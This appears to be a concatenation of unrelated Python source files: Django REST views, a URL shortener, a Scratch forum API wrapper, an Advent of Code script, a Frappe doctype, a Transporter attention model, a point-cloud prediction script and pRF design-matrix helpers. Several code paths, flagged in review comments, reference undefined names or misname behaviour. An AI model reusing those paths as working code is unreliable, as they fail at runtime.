        return JSONResponse(serializer.data)

    @csrf_exempt
    @swagger_auto_schema(
        operation_description="Updates a Cuisine object with a given id.",
        # query_serializer=CuisineSerializer,
        request_body=openapi.Schema(
            type=openapi.TYPE_OBJECT,
            required=['name'],
            properties={
                'name': openapi.Schema(
                    description='The cuisines unique name.',
                    type=openapi.TYPE_STRING
                )
            },
        ),
        responses={
            200: CuisineSerializer(many=False),
            400: """
                The required request parameters are not met.
            """,
            404: """
                The object could not be updated, since it doesn't exist.
            """,
        },
        tags=['Cuisine'],
    )
    def put(self, request, pk):
        """Fully update the Cuisine with primary key *pk* from the JSON body."""
        try:
            data = Cuisine.objects.get(pk=pk)
        except Cuisine.DoesNotExist:
            return HttpResponse(
                status=status.HTTP_404_NOT_FOUND
            )
        parsed_data = JSONParser().parse(request)
        serializer = CuisineSerializer(
            data,
            data=parsed_data
        )
        if serializer.is_valid():
            serializer.save()
            return JSONResponse(serializer.data)
        return JSONResponse(
            serializer.errors,
            status=status.HTTP_400_BAD_REQUEST
        )

    @csrf_exempt
    @swagger_auto_schema(
        # clarified: this endpoint performs a partial update (was a copy of put's text)
        operation_description="Partially updates a Cuisine object with a given id.",
        # query_serializer=CuisineSerializer,
        request_body=openapi.Schema(
            type=openapi.TYPE_OBJECT,
            required=[],
            properties={
                'name': openapi.Schema(
                    description='The cuisines unique name.',
                    type=openapi.TYPE_STRING
                )
            },
        ),
        responses={
            200: CuisineSerializer(many=False),
            400: """
                The required request parameters are not met.
            """,
            404: """
                The object could not be updated, since it doesn't exist.
            """,
        },
        tags=['Cuisine'],
    )
    def patch(self, request, pk):
        """Partially update the Cuisine with primary key *pk* (partial=True)."""
        try:
            data = Cuisine.objects.get(pk=pk)
        except Cuisine.DoesNotExist:
            return HttpResponse(
                status=status.HTTP_404_NOT_FOUND
            )
        parsed_data = JSONParser().parse(request)
        serializer = CuisineSerializer(
            data,
            data=parsed_data,
            partial=True
        )
        if serializer.is_valid():
            serializer.save()
            return JSONResponse(serializer.data)
        return JSONResponse(
            serializer.errors,
            status=status.HTTP_400_BAD_REQUEST
        )

    @csrf_exempt
    @swagger_auto_schema(
        operation_description="Deletes a Cuisine object with a given id.",
        responses={
            # fixed: the view returns HTTP 204 (No Content), not 203
            204: None,
            404: """
                The object could not be deleted, since it doesn't exist.
            """,
        },
        tags=['Cuisine'],
    )
    def delete(self, request, pk):
        """Delete the Cuisine with primary key *pk*; 204 on success, 404 if absent."""
        try:
            data = Cuisine.objects.get(pk=pk)
        except Cuisine.DoesNotExist:
            return HttpResponse(
                status=status.HTTP_404_NOT_FOUND
            )
        data.delete()
        return HttpResponse(status=status.HTTP_204_NO_CONTENT)
|
from django.shortcuts import render, HttpResponse, redirect
from url.models import shorturl
def urlshort(request, query=None):
    """Redirect a short-URL *query* to its original URL.

    With no query the landing page is rendered; an unknown query renders the
    landing page with an error flag. Each successful lookup increments the
    entry's visit counter before redirecting.
    """
    if not query:  # covers both None and the empty string (was a redundant double check)
        return render(request, 'url/home.html')
    try:
        entry = shorturl.objects.get(short_query=query)
    except shorturl.DoesNotExist:
        return render(request, 'url/home.html', {'error': "error"})
    # narrow try block: only the lookup can raise DoesNotExist
    entry.visits += 1
    entry.save()
    return redirect(entry.original_url)
"""
The Forum Post Code
"""
import requests
from scratchlink import Exceptions
# Base Scratch hostnames used when building API URLs.
_website = "scratch.mit.edu"
_api = f"api.{_website}"
class Forum:
    """A Scratch forum topic, populated from the ScratchDB topic-info API."""

    def __init__(self, id):
        self.headers = {
            "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36"
        }
        self.f_id = str(id)
        self.update_data()

    def update_data(self):
        """
        Update the data
        """
        try:
            data = requests.get(f"https://scratchdb.lefty.one/v3/forum/topic/info/{self.f_id}",
                                headers=self.headers).json()
            # Field accesses must stay inside the try: a missing topic yields a
            # payload without these keys, and the resulting KeyError is what
            # signals an invalid forum id. (Previously these lines sat outside
            # the try, so the except clause could never fire.)
            self.f_title = data['title']
            self.f_category = data['category']
            self.f_is_closed = data['closed'] == 1
            self.f_is_deleted = data['deleted'] == 1
            self.f_time = data['time']
            self.f_post_count = data["post_count"]
        except KeyError:
            raise Exceptions.InvalidForumTopic(f"Forum with ID - '{self.f_id}' doesn't exist!")

    def id(self):
        """
        Returns the id of the forum
        """
        return self.f_id

    def title(self):
        """
        Returns the title of the forum
        """
        return self.f_title

    def category(self):
        """
        Returns the category of the forum
        """
        return self.f_category

    def is_closed(self):
        """
        Returns whether the forum is closed or not
        """
        return self.f_is_closed

    def is_deleted(self):
        """
        Returns whether the forum is deleted or not
        """
        return self.f_is_deleted

    def time(self):
        """
        Returns the activity of the forum
        """
        return self.f_time

    def post_count(self):
        """
        Returns the total post count of the forum
        """
        return self.f_post_count

    def posts(self, page=1):
        """
        Get the post in Forum Topic of a specified page. Images and some other stuff will not appear!
        :param page: The page
        """
        return requests.get(f"https://scratch-forum.sid72020123.repl.co/forum/?topic={self.f_id}&page={page}",
                            headers=self.headers).json()

    def _all_data(self):
        """
        DON'T USE THIS
        """
        data = {
            'Forum ID': self.id(),
            'Title': self.title(),
            'Category': self.category(),
            'Is Closed?': self.is_closed(),
            'Is Deleted?': self.is_deleted(),
            'Post Count': self.post_count()
        }
        return data

    def pretty_print_topic_data(self):
        """
        Pretty Print the Forum Topic Data
        """
        data = self._all_data()
        length = self._find_max_length(data) + 10
        print("\033[1;33;40m" + "-" * length)
        print("\033[1;35;40m" + "Data of Forum with ID", str(self.f_id) + ":")
        for i in data:
            print("\t\033[1;32;40m" + i + ":", "\033[1;34;40m" + str(data[i]).replace("\n", " "))
        print("\033[1;33;40m" + "-" * length)
        print("\033[0m")

    def _find_max_length(self, d):
        """
        DON'T USE THIS
        """
        # length of the longest value's string representation
        length = 0
        for i in d.values():
            if len(str(i)) > length:
                length = len(str(i))
        return length
|
from utils import read_file
from intcode import Intcode, Task
# Advent of Code day 9: run the BOOST Intcode program.
print("#--- part1 ---#")
program = list(map(int, read_file('09.txt')[0].split(',')))
vm = Intcode()
vm.run(Task('part1', program, [1], ramsize=4096))
print(vm.tasks[0].outputs[0])
# Part 2 uses input 2; the program is re-read so this run starts from a
# pristine copy (presumably the VM mutates its memory -- confirm in Intcode).
print("#--- part2 ---#")
program = list(map(int, read_file('09.txt')[0].split(',')))
vm = Intcode()
vm.run(Task('part2', program, [2], ramsize=4096))
print(vm.tasks[0].outputs[0])
|
from .component import *
from .context import *
from .event import *
from .runner import *
from .utils import *
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, New Indictrans Technologies pvt.ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.utils import nowdate
from frappe.utils.user import UserPermissions
from frappe import *
import frappe
from frappe import _
from frappe.model.document import Document
# Validation error for an invalid leave approver. NOTE(review): not raised
# anywhere in this file -- presumably imported elsewhere; confirm before removing.
class InvalidLeaveApproverError(frappe.ValidationError): pass
class BookBill(Document):
    """Book bill document: may only be submitted once fully paid."""

    def validate(self):
        # No validation rules yet. (Removed dead code that built and
        # discarded a list containing self.payments.)
        pass

    def on_submit(self):
        """Block submission while any balance amount remains outstanding."""
        if self.balance_amount > 0:
            frappe.throw(_("Only Balance Amount with 0 can be submitted"))
#!/usr/bin/env python
import os
import sys
import cv2
import numpy as np
import tensorflow as tf
import tensorflow_addons as tfa
from ravens.models import ResNet43_8s
from ravens import utils
class Attention:
    """Daniel: attention model implemented as an hourglass FCN.

    Used for the picking network, and for placing if doing the 'no-transport'
    ablation. By default our TransporterAgent class (using this for picking)
    has num_rotations=1, leaving rotations to the Transport component. Input
    shape is (320,160,6) with 3 height maps, and then we change it so the H
    and W are both 320 (to support rotations).

    In the normal Transporter model, this component only uses one rotation,
    so the label is just sized at (320,160,1).
    """

    def __init__(self, input_shape, num_rotations, preprocess):
        # preprocess: callable applied to the padded input before the network.
        self.num_rotations = num_rotations
        self.preprocess = preprocess

        # Pad H and W symmetrically up to the larger of the two so the input
        # becomes square (required for in-plane rotations).
        max_dim = np.max(input_shape[:2])
        self.padding = np.zeros((3, 2), dtype=int)
        pad = (max_dim - np.array(input_shape[:2])) / 2
        self.padding[:2] = pad.reshape(2, 1)

        input_shape = np.array(input_shape)
        input_shape += np.sum(self.padding, axis=1)
        input_shape = tuple(input_shape)

        # Initialize fully convolutional Residual Network with 43 layers and
        # 8-stride (3 2x2 max pools and 3 2x bilinear upsampling)
        d_in, d_out = ResNet43_8s(input_shape, 1)
        self.model = tf.keras.models.Model(inputs=[d_in], outputs=[d_out])
        self.optim = tf.keras.optimizers.Adam(learning_rate=1e-4)
        self.metric = tf.keras.metrics.Mean(name='attention_loss')

    def forward(self, in_img, apply_softmax=True):
        """Forward pass.

        in_img.shape: (320, 160, 6)
        input_data.shape: (320, 320, 6), then (None, 320, 320, 6)
        """
        input_data = np.pad(in_img, self.padding, mode='constant')
        input_data = self.preprocess(input_data)
        input_shape = (1,) + input_data.shape
        input_data = input_data.reshape(input_shape)
        in_tens = tf.convert_to_tensor(input_data, dtype=tf.float32)

        # Rotate input
        pivot = np.array(input_data.shape[1:3]) / 2
        rvecs = self.get_se2(self.num_rotations, pivot)
        in_tens = tf.repeat(in_tens, repeats=self.num_rotations, axis=0)
        # https://www.tensorflow.org/addons/api_docs/python/tfa/image/transform
        in_tens = tfa.image.transform(in_tens, rvecs, interpolation='NEAREST')

        # Forward pass (one model call per rotated copy)
        in_tens = tf.split(in_tens, self.num_rotations)
        logits = ()
        for x in in_tens:
            logits += (self.model(x),)
        logits = tf.concat(logits, axis=0)

        # Rotate back output, then crop away the padding added above
        rvecs = self.get_se2(self.num_rotations, pivot, reverse=True)
        logits = tfa.image.transform(logits, rvecs, interpolation='NEAREST')
        c0 = self.padding[:2, 0]
        c1 = c0 + in_img.shape[:2]
        logits = logits[:, c0[0]:c1[0], c0[1]:c1[1], :]

        logits = tf.transpose(logits, [3, 1, 2, 0])
        output = tf.reshape(logits, (1, np.prod(logits.shape)))
        if apply_softmax:
            # NOTE(review): despite the flag name, no softmax is applied here --
            # the flat logits are only cast to float32 and reshaped back to
            # (H, W, num_rotations). Confirm whether a tf.nn.softmax call was
            # removed intentionally.
            output = np.float32(output).reshape(logits.shape[1:])
        return output

    def train(self, in_img, p, theta):
        """One gradient step on a single (image, pick point, angle) example.

        p: (row, col) pixel of the pick point; theta: pick angle in radians,
        discretized into one of num_rotations bins for the one-hot label.
        Returns the scalar loss as float32.
        """
        self.metric.reset_states()
        with tf.GradientTape() as tape:
            output = self.forward(in_img, apply_softmax=False)

            # Compute label
            theta_i = theta / (2 * np.pi / self.num_rotations)
            theta_i = np.int32(np.round(theta_i)) % self.num_rotations
            label_size = in_img.shape[:2] + (self.num_rotations,)
            label = np.zeros(label_size)
            label[p[0], p[1], theta_i] = 1
            label = label.reshape(1, np.prod(label.shape))
            label = tf.convert_to_tensor(label, dtype=tf.float32)

            # Compute loss
            loss = tf.nn.softmax_cross_entropy_with_logits(label, output)
            loss = tf.reduce_mean(loss)

        # Backpropagate
        grad = tape.gradient(loss, self.model.trainable_variables)
        self.optim.apply_gradients(
            zip(grad, self.model.trainable_variables))

        self.metric(loss)
        return np.float32(loss)

    def load(self, path):
        """Load model weights from *path*."""
        self.model.load_weights(path)

    def save(self, filename):
        """Save the full model to *filename*."""
        self.model.save(filename)

    def get_se2(self, num_rotations, pivot, reverse=False):
        '''
        Get SE2 rotations discretized into num_rotations angles counter-clockwise.
        Returns list (np.array) where each item is a flattened SE2 rotation matrix.
        '''
        rvecs = []
        for i in range(num_rotations):
            theta = i * 2 * np.pi / num_rotations
            theta = -theta if reverse else theta
            rmat = utils.get_image_transform(theta, (0, 0), pivot)
            rvec = rmat.reshape(-1)[:-1]
            rvecs.append(rvec)
        return np.array(rvecs, dtype=np.float32)

    def get_attention_heatmap(self, attention):
        """Given attention, get a human-readable heatmap.

        https://docs.opencv.org/master/d3/d50/group__imgproc__colormap.html
        In my normal usage, the attention is already softmax-ed but just be
        aware in case it's not. Also be aware of RGB vs BGR mode. We should
        ensure we're in BGR mode before saving. Also with RAINBOW mode, red =
        hottest (highest attention values), green=medium, blue=lowest.

        Note: to see the grayscale only (which may be easier to interpret,
        actually...) save `vis_attention` just before applying the colormap.
        """
        # Options: cv2.COLORMAP_PLASMA, cv2.COLORMAP_JET, etc.
        #attention = tf.reshape(attention, (1, np.prod(attention.shape)))
        #attention = tf.nn.softmax(attention)
        vis_attention = np.float32(attention).reshape((320, 160))
        vis_attention = vis_attention - np.min(vis_attention)
        vis_attention = 255 * vis_attention / np.max(vis_attention)
        vis_attention = cv2.applyColorMap(np.uint8(vis_attention), cv2.COLORMAP_RAINBOW)
        vis_attention = cv2.cvtColor(vis_attention, cv2.COLOR_RGB2BGR)
        return vis_attention
# -*- coding: utf-8 -*-
from . import account_move
from . import payment_acquirer
from . import payment_icon
from . import payment_transaction
|
import startup
import os
import numpy as np
import imageio
import scipy.io
#import tensorflow as tf
#import tensorflow.contrib.slim as slim
import torch
from torch.utils.tensorboard import SummaryWriter
import pdb
from util.common import parse_lines
from util.app_config import config as app_config
from util.system import setup_environment
from util.simple_dataset import Dataset3D
from util.fs import mkdir_if_missing
from util.camera import get_full_camera, quaternion_from_campos
from util.visualise import vis_pc, merge_grid, mask4vis
from util.point_cloud_to import pointcloud2voxels3d_fast, pointcloud_project_fast
#pointcloud2voxels, smoothen_voxels3d, pointcloud2voxels3d_fast, pointcloud_project_fast
from util.quaternion import as_rotation_matrix, quaternion_rotate
from models import model_pc_to as model_pc
from run.ShapeRecords import ShapeRecords
import pickle
def build_model(model, input, global_step):
    """Run *model* on one pre-processed sample, inference only.

    Numpy arrays in the *input* dict are converted in place to torch tensors
    on the available device; the model is evaluated without gradient tracking
    and its output dict is augmented with the inputs and camera metadata.
    Returns the augmented outputs dict.
    """
    cfg = model.cfg()
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    # pose-predicting models consume the full image set; others use 'images_1'
    code = 'images' if cfg.predict_pose else 'images_1'
    for k in input.keys():
        try:
            input[k] = torch.from_numpy(input[k]).to(device)
        except AttributeError:
            # entry is not a numpy array (e.g. already a tensor); leave as-is
            pass
    with torch.no_grad():
        outputs = model(input, global_step, is_training=False, run_projection=False)
    outputs["inputs"] = input[code]
    outputs["camera_extr_src"] = input['matrices']
    outputs["cam_quaternion"] = input['camera_quaternion']
    # camera transform only exists when the model predicts poses
    outputs["cam_transform"] = outputs['poses'] if cfg.predict_pose else None
    return outputs
def model_student(inputs, model):
    """Return the student network's camera-pose prediction for *inputs*.

    Only the pose is needed by callers; the point-cloud projection step is
    deliberately not computed here. (Removed dead locals -- points, rgb and
    the translation -- that fed only commented-out projection code.)
    """
    outputs = model.model_predict(inputs, is_training=False,
                                  predict_for_all=False)
    return outputs["pose_student"]
def model_unrotate_points(cfg):
    """
    un_q = quat_gt^(-1) * predicted_quat
    pc_unrot = un_q * pc_np * un_q^(-1)
    """
    # NOTE(review): dead TensorFlow-era code.  `tf` is not available (the
    # tensorflow import at the top of the file is commented out) and
    # `pred_quat` / `input_pc` are never defined in this scope, so calling
    # this function raises NameError.  Kept verbatim; port or delete.
    from util.quaternion import quaternion_normalise, quaternion_conjugate, \
        quaternion_rotate, quaternion_multiply
    gt_quat = tf.placeholder(dtype=tf.float32, shape=[1, 4])
    pred_quat_n = quaternion_normalise(pred_quat)
    gt_quat_n = quaternion_normalise(gt_quat)
    # undo the ground-truth rotation, then apply the predicted one
    un_q = quaternion_multiply(quaternion_conjugate(gt_quat_n), pred_quat_n)
    pc_unrot = quaternion_rotate(input_pc, un_q)
    return input_pc, pred_quat, gt_quat, pc_unrot
def normalise_depthmap(depth_map):
    """Map depth values into [0, 1] by clamping to [1.5, 2.5] and shifting.

    Values below 1.5 map to 0.0 and values above 2.5 map to 1.0.
    """
    clamped = np.clip(depth_map, 1.5, 2.5)
    return clamped - 1.5
def compute_predictions():
    """Restore a trained point-cloud model from its checkpoint and dump
    per-view predictions (point clouds and, when enabled, camera poses)
    for every model in the validation split.

    All settings come from the global ``app_config``; results are written
    as ``*_pc.pkl`` files under ``cfg.save_predictions_dir`` inside the
    checkpoint directory.  Large parts of the original visualisation and
    voxelisation pipeline are commented out and kept for reference.
    """
    cfg = app_config
    setup_environment(cfg)
    exp_dir = cfg.checkpoint_dir
    # predictions are computed one view at a time
    cfg.batch_size = 1
    cfg.step_size = 1
    pc_num_points = cfg.pc_num_points
    vox_size = cfg.vox_size
    save_pred = cfg.save_predictions
    save_voxels = cfg.save_voxels
    fast_conversion = True
    pose_student = cfg.pose_predictor_student and cfg.predict_pose
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    model = model_pc.ModelPointCloud(cfg)
    model = model.to(device)
    log_dir = '../../dpc/run/model_run_data/'
    learning_rate = 1e-4
    # the optimizer exists only so its state can be restored from the checkpoint
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay = cfg.weight_decay)
    global_step = 100000
    if global_step>0:
        checkpoint_path = os.path.join(log_dir,'model.ckpt_{}.pth'.format(global_step))
        print("Loading from path:",checkpoint_path)
        checkpoint = torch.load(checkpoint_path)
        global_step_val = checkpoint['global_step']
        model.load_state_dict(checkpoint['model_state_dict'])
        optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
        loss = checkpoint['loss']
    else:
        # NOTE(review): 'loss' is only assigned in the branch above, so the
        # print below would raise NameError if global_step were <= 0.
        global_step_val = global_step
    print('Restored checkpoint at {} with loss {}'.format(global_step, loss))
    save_dir = os.path.join(exp_dir, '{}_vis_proj'.format(cfg.save_predictions_dir))
    mkdir_if_missing(save_dir)
    save_pred_dir = os.path.join(exp_dir, cfg.save_predictions_dir)
    mkdir_if_missing(save_pred_dir)
    vis_size = cfg.vis_size
    split_name = "val"
    dataset_folder = cfg.inp_dir
    dataset = ShapeRecords(dataset_folder, cfg, split_name)
    # NOTE(review): dataset_loader is built but never iterated; samples are
    # fetched directly via dataset.__getitem__ below.
    dataset_loader = torch.utils.data.DataLoader(dataset,
                                                 batch_size=cfg.batch_size, shuffle=cfg.shuffle_dataset,
                                                 num_workers=4,drop_last=True)
    pose_num_candidates = cfg.pose_predict_num_candidates
    num_views = cfg.num_views
    plot_h = 4
    plot_w = 6
    # at most half the grid cells hold views (the other half held projections)
    num_views = int(min(num_views, plot_h * plot_w / 2))
    if cfg.models_list:
        model_names = parse_lines(cfg.models_list)
    else:
        model_names = dataset.file_names
    num_models = len(model_names)
    for k in range(num_models):
        model_name = model_names[k]
        sample = dataset.__getitem__(k)
        images = sample['image']
        masks = sample['mask']
        if cfg.saved_camera:
            cameras = sample['extrinsic']
            cam_pos = sample['cam_pos']
        if cfg.vis_depth_projs:
            depths = sample['depth']
        if cfg.variable_num_views:
            num_views = sample['num_views']
        print("{}/{} {}".format(k, num_models, model_name))
        # 'grid' fed the commented-out visualisation code further down
        if pose_num_candidates == 1:
            grid = np.empty((plot_h, plot_w), dtype=object)
        else:
            plot_w = pose_num_candidates + 1
            if pose_student:
                plot_w += 1
            grid = np.empty((num_views, plot_w), dtype=object)
        if save_pred:
            all_pcs = np.zeros((num_views, pc_num_points, 3))
            all_cameras = np.zeros((num_views, 4))
            #all_voxels = np.zeros((num_views, vox_size, vox_size, vox_size))
            #all_z_latent = np.zeros((num_views, cfg.fc_dim))
        for view_idx in range(num_views):
            input_image_np = images[[view_idx], :, :, :]
            gt_mask_np = masks[[view_idx], :, :, :]
            if cfg.saved_camera:
                extr_mtr = cameras[view_idx, :, :]
                cam_quaternion_np = quaternion_from_campos(cam_pos[view_idx, :])
                cam_quaternion_np = np.expand_dims(cam_quaternion_np, axis=0)
            else:
                extr_mtr = np.zeros((4, 4))
            code = 'images' if cfg.predict_pose else 'images_1'
            # NOTE(review): cam_quaternion_np is only set when cfg.saved_camera
            # is True -- the dict below assumes saved cameras are available.
            input = {code: input_image_np,
                     'matrices': extr_mtr,
                     'camera_quaternion': cam_quaternion_np}
            out = build_model(model, input, global_step)
            input_image = out["inputs"]
            cam_matrix = out["camera_extr_src"]
            cam_quaternion = out["cam_quaternion"]
            point_cloud = out["points_1"]
            #gb = out["rgb_1"] if cfg.pc_rgb else None
            #rojs = out["projs"]
            #rojs_rgb = out["projs_rgb"]
            #rojs_depth = out["projs_depth"]
            cam_transform = out["cam_transform"]
            #_latent = out["z_latent"]
            #if cfg.pc_rgb:
            #    proj_tensor = projs_rgb
            #elif cfg.vis_depth_projs:
            #    proj_tensor = projs_depth
            #else:
            #    proj_tensor = projs
            if pose_student:
                camera_student_np = out["pose_student"]
                predicted_camera = camera_student_np
            else:
                # NOTE(review): cam_transf_np is never defined (the value is
                # 'cam_transform' above); this branch raises NameError when
                # the student pose predictor is disabled -- confirm intent.
                predicted_camera = cam_transf_np
            #if cfg.vis_depth_projs:
            #    proj_np = normalise_depthmap(out["projs"])
            #    if depths is not None:
            #        depth_np = depths[view_idx, :, :, :]
            #        depth_np = normalise_depthmap(depth_np)
            #    else:
            #        depth_np = 1.0 - np.squeeze(gt_mask_np)
            #    if pose_student:
            #        proj_student_np = normalise_depthmap(proj_student_np)
            #if save_voxels:
            #    if fast_conversion:
            #        voxels, _ = pointcloud2voxels3d_fast(cfg, input_pc, None)
            #        voxels = tf.expand_dims(voxels, axis=-1)
            #        voxels = smoothen_voxels3d(cfg, voxels, model.gauss_kernel())
            #    else:
            #        voxels = pointcloud2voxels(cfg, input_pc, model.gauss_sigma())
            if cfg.predict_pose:
                if cfg.save_rotated_points:
                    ref_rot = scipy.io.loadmat("{}/final_reference_rotation.mat".format(exp_dir))
                    ref_rot = ref_rot["rotation"]
                    # NOTE(review): input_pc, ref_quat and pc_np_unrot are
                    # undefined (TF-era leftovers) -- this path raises
                    # NameError if cfg.save_rotated_points is enabled.
                    pc_unrot = quaternion_rotate(input_pc, ref_quat)
                    point_cloud = pc_np_unrot
            if cfg.pc_rgb:
                gt_image = input_image_np
            elif cfg.vis_depth_projs:
                # NOTE(review): depth_np is only produced by the commented-out
                # block above, so this branch would also raise NameError.
                gt_image = depth_np
            else:
                gt_image = gt_mask_np
            # if pose_num_candidates == 1:
            #     view_j = view_idx * 2 // plot_w
            #     view_i = view_idx * 2 % plot_w
            #     gt_image = np.squeeze(gt_image)
            #     grid[view_j, view_i] = mask4vis(cfg, gt_image, vis_size)
            #     curr_img = np.squeeze(out[projs])
            #     grid[view_j, view_i + 1] = mask4vis(cfg, curr_img, vis_size)
            #     if cfg.save_individual_images:
            #         curr_dir = os.path.join(save_dir, model_names[k])
            #         if not os.path.exists(curr_dir):
            #             os.makedirs(curr_dir)
            #         imageio.imwrite(os.path.join(curr_dir, '{}_{}.png'.format(view_idx, 'rgb_gt')),
            #                         mask4vis(cfg, np.squeeze(input_image_np), vis_size))
            #         imageio.imwrite(os.path.join(curr_dir, '{}_{}.png'.format(view_idx, 'mask_pred')),
            #                         mask4vis(cfg, np.squeeze(proj_np), vis_size))
            # else:
            #     view_j = view_idx
            #     gt_image = np.squeeze(gt_image)
            #     grid[view_j, 0] = mask4vis(cfg, gt_image, vis_size)
            #     for kk in range(pose_num_candidates):
            #         curr_img = np.squeeze(out["projs"][kk, :, :, :].detach().cpu())
            #         grid[view_j, kk + 1] = mask4vis(cfg, curr_img, vis_size)
            #         if cfg.save_individual_images:
            #             curr_dir = os.path.join(save_dir, model_names[k])
            #             if not os.path.exists(curr_dir):
            #                 os.makedirs(curr_dir)
            #             imageio.imwrite(os.path.join(curr_dir, '{}_{}_{}.png'.format(view_idx, kk, 'mask_pred')),
            #                             mask4vis(cfg, np.squeeze(curr_img), vis_size))
            #     if cfg.save_individual_images:
            #         imageio.imwrite(os.path.join(curr_dir, '{}_{}.png'.format(view_idx, 'mask_gt')),
            #                         mask4vis(cfg, np.squeeze(gt_mask_np), vis_size))
            #     if pose_student:
            #         grid[view_j, -1] = mask4vis(cfg, np.squeeze(proj_student_np.detach().cpu()), vis_size)
            if save_pred:
                #pc_np = pc_np.detach().cpu().numpy()
                all_pcs[view_idx, :, :] = np.squeeze(point_cloud.detach().cpu())
                #all_z_latent[view_idx] = z_latent.detach().cpu()
                if cfg.predict_pose:
                    all_cameras[view_idx, :] = predicted_camera.detach().cpu()
            # if save_voxels:
            #     # multiplying by two is necessary because
            #     # pc->voxel conversion expects points in [-1, 1] range
            #     pc_np_range = pc_np
            #     if not fast_conversion:
            #         pc_np_range *= 2.0
            #     voxels_np = sess.run(voxels, feed_dict={input_pc: pc_np_range})
            #     all_voxels[view_idx, :, :, :] = np.squeeze(voxels_np)
            # vis_view = view_idx == 0 or cfg.vis_all_views
            # if cfg.vis_voxels and vis_view:
            #     rgb_np = np.squeeze(rgb_np) if cfg.pc_rgb else None
            #     vis_pc(np.squeeze(pc_np), rgb=rgb_np)
        #grid_merged = merge_grid(cfg, grid)
        #imageio.imwrite("{}/{}_proj.png".format(save_dir, sample.file_names), grid_merged)
        if save_pred:
            # the .mat path is disabled; predictions are pickled instead
            if 0:
                save_dict = {"points": all_pcs}
                if cfg.predict_pose:
                    save_dict["camera_pose"] = all_cameras
                scipy.io.savemat("{}/{}_pc.mat".format(save_pred_dir, model_names[k]),
                                 mdict=save_dict)
            else:
                save_dict = {"points": all_pcs}
                if cfg.predict_pose:
                    save_dict["camera_pose"] = all_cameras
                with open("{}/{}_pc.pkl".format(save_pred_dir, model_names[k]), 'wb') as handle:
                    pickle.dump(save_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
        # if save_voxels:
        #     np.savez("{}/{}_vox".format(save_pred_dir,model_names[k]), all_voxels)
#def main(_):
def main():
    """Entry point: run prediction export over the validation split."""
    compute_predictions()

if __name__ == '__main__':
    #tf.app.run()
    main()
|
import os
import numpy as np
import h5py
import nibabel as nb
from collections import defaultdict as dd
from pathlib import Path
import matplotlib.image as mpimg
from scipy.stats import zscore
opj = os.path.join
from prfpy.timecourse import filter_predictions
from prfpy.stimulus import PRFStimulus2D
def roi_mask(roi, array):
    """Zero out every element of *array* that lies outside the ROI.

    Args:
        roi: index expression selecting the region of interest.
        array: numpy array to mask.

    Returns:
        A new array equal to *array* inside the ROI and 0 elsewhere.
    """
    selector = np.zeros_like(array, dtype=bool)
    selector[roi] = True
    return array * selector
def inverse_roi_mask(roi, array):
    """Zero out every element of *array* that lies inside the ROI.

    Args:
        roi: index expression selecting the region of interest.
        array: numpy array to mask.

    Returns:
        A new array equal to *array* outside the ROI and 0 inside it.
    """
    selector = np.ones_like(array, dtype=bool)
    selector[roi] = False
    return array * selector
def create_dm_from_screenshots(screenshot_path,
                               n_pix=40,
                               dm_edges_clipping=[0,0,0,0]
                               ):
    """Build a binary (n_pix, n_pix, n_timepoints) pRF design matrix from a
    folder of stimulus screenshots.

    Each screenshot is cropped square, downsampled to n_pix and binarized:
    pixels that are black, white, or any non-mid grey count as stimulus (1).
    Assumes standard RGB255 images whose only colors are black, white, grey,
    red and green, and that the last three digits before '.png' encode the
    1-based screenshot number.

    Args:
        screenshot_path: directory containing the screenshot images.
        n_pix: output resolution; must divide the (square) image size.
        dm_edges_clipping: [top, bottom, left, right] rows/columns to zero.
            NOTE: the default list is never mutated, so the shared-default
            pitfall does not bite here; kept as a list for interface
            compatibility.

    Returns:
        numpy array of shape (n_pix, n_pix, len(images) + 1); the extra
        timepoint accounts for there being one more MR volume than
        screenshots.
    """
    image_list = os.listdir(screenshot_path)
    # there is one more MR image than screenshot
    design_matrix = np.zeros((n_pix, n_pix, 1+len(image_list)))
    for image_file in image_list:
        # assuming last three numbers before .png are the screenshot number
        img_number = int(image_file[-7:-4])-1
        # subtract one to start from zero
        img = (255*mpimg.imread(os.path.join(screenshot_path, image_file))).astype('int')
        # make it square
        if img.shape[0] != img.shape[1]:
            offset = int((img.shape[1]-img.shape[0])/2)
            img = img[:, offset:(offset+img.shape[0])]
        assert img.shape[0]%n_pix == 0, f"please choose a n_pix value that is a divisor of {str(img.shape[0])}"
        # downsample
        downsampling_constant = int(img.shape[0]/n_pix)
        downsampled_img = img[::downsampling_constant, ::downsampling_constant]
        # binarize image into dm matrix
        # assumes: standard RGB255 format; only colors present in image are black, white, grey, red, green.
        design_matrix[:, :, img_number][np.where(((downsampled_img[:, :, 0] == 0) & (
            downsampled_img[:, :, 1] == 0)) | ((downsampled_img[:, :, 0] == 255) & (downsampled_img[:, :, 1] == 255)))] = 1
        design_matrix[:, :, img_number][np.where(((downsampled_img[:, :, 0] == downsampled_img[:, :, 1]) & (
            downsampled_img[:, :, 1] == downsampled_img[:, :, 2]) & (downsampled_img[:,:,0] != 127) ))] = 1
    #clipping edges
    #top, bottom, left, right
    design_matrix[:dm_edges_clipping[0],:,:] = 0
    design_matrix[(design_matrix.shape[0]-dm_edges_clipping[1]):,:,:] = 0
    design_matrix[:,:dm_edges_clipping[2],:] = 0
    # BUG FIX: the right-edge clip used shape[0] (rows) instead of shape[1]
    # (columns). Identical for the square matrices built here, but wrong in
    # general and misleading to readers.
    design_matrix[:,(design_matrix.shape[1]-dm_edges_clipping[3]):,:] = 0
    print("Design matrix completed")
    return design_matrix
def create_full_stim(screenshot_paths,
                     n_pix,
                     discard_volumes,
                     baseline_volumes_begin_end,
                     dm_edges_clipping,
                     screen_size_cm,
                     screen_distance_cm,
                     TR,
                     task_names,
                     normalize_integral_dx):
    """Assemble the design matrices of all tasks into one PRFStimulus2D.

    For each task, loads either an HCP-format hdf5 design matrix or a folder
    of screenshots (via create_dm_from_screenshots), concatenates them along
    time, and records per-task "late isolation" periods (timepoints where the
    bar has been absent for at least 7 TRs) for BOLD-baseline estimation.

    Note: ``baseline_volumes_begin_end`` is currently unused -- confirm
    whether it should feed into the baseline-period computation.
